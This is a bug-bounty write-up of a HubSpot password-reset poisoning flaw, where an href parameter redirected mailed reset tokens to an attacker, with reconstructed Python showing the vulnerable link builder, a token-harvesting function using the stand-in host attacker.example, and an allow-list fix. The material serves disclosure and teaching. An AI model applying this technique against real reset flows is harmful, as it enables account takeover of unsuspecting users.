HubSpot Full Account Takeover in Bug Bounty
Original Post:
We discussed this vulnerability during Episode 195 on 13 March 2023
A lot of wrong turns eventually led to some parameter brute forcing and the discovery of an href parameter accepted by the Forgot Password request. The href value was used as the base of the password-reset link: the real reset token was appended to it, and the resulting link was reflected in the Forgot Password email. Because that email genuinely originates from HubSpot, a victim who clicked the link would be taken to an attacker-controlled location with the token in the URL, handing the token to the attacker and allowing a full account takeover. The same class of bug appears in any reset or magic-link flow that lets the client influence the host of the mailed link, whether through a request parameter or the Host header.
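The link construction described above, reconstructed as an added example that is not the post's or HubSpot's code: the vulnerable builder appends the real token to whatever href the client supplied, attacker_harvest shows what the attacker's server receives when the victim clicks, and the hardened builder only honours an href whose origin is on an allow-list and otherwise falls back to the server's own reset URL. Host names, the token parameter name, and the allow-list are assumptions.

```python
from typing import Optional
from urllib.parse import parse_qs, urlencode, urlsplit

# All names below are hypothetical stand-ins for the post's description,
# not HubSpot's real hosts, parameters or code.
TRUSTED_RESET_ORIGINS = {"app.example.com"}  # hosts allowed to receive reset links
DEFAULT_RESET_BASE = "https://app.example.com/reset-password"


def append_token(base: str, token: str) -> str:
    """Append the reset token as a query parameter to a base URL."""
    sep = "&" if "?" in base else "?"
    return f"{base}{sep}{urlencode({'token': token})}"


def build_reset_link_vulnerable(href: str, token: str) -> str:
    """The flaw as described: whatever the client sent as href becomes the
    base of the mailed link, with the real token appended to it."""
    return append_token(href, token)


def href_is_trusted(href: str) -> bool:
    """Allow-list check for a client-supplied href.

    Rejects anything that is not an absolute https URL on a trusted host:
    scheme-relative (//evil.example), other schemes, userinfo tricks
    (https://app.example.com@evil.example), subdomain look-alikes
    (app.example.com.evil.example) and non-standard ports.
    """
    parts = urlsplit(href)
    if parts.scheme != "https" or not parts.netloc:
        return False
    if parts.username is not None or parts.password is not None:
        return False
    try:
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return False
    if port not in (None, 443):
        return False
    return (parts.hostname or "") in TRUSTED_RESET_ORIGINS


def build_reset_link_safe(href: str, token: str) -> str:
    """Hardened form: the client may only pick a destination on a trusted
    origin; anything else is ignored and the server's own base is used."""
    base = href if href_is_trusted(href) else DEFAULT_RESET_BASE
    return append_token(base, token)


def attacker_harvest(request_url: str) -> Optional[str]:
    """What the attacker's server sees when the victim clicks the mailed
    link: the token arrives in the query string of a request to the
    attacker's host."""
    qs = parse_qs(urlsplit(request_url).query)
    return qs.get("token", [None])[0]


def demo() -> dict:
    """Run the vulnerable and hardened builders on a constructed attacker href."""
    token = "3f9a1c77e2b04d0e"  # constructed sample token, not a real one
    attacker_href = "https://attacker.example/collect"
    leaked_link = build_reset_link_vulnerable(attacker_href, token)
    return {
        "vulnerable_link": leaked_link,
        "token_seen_by_attacker": attacker_harvest(leaked_link),
        "hardened_link": build_reset_link_safe(attacker_href, token),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The hardened check is an allow-list on the full origin (scheme, host, port) rather than a substring match on the hostname, which is what defeats look-alike hosts and userinfo tricks; the simplest fix of all is to drop the client-controlled href entirely and always use the server-configured base.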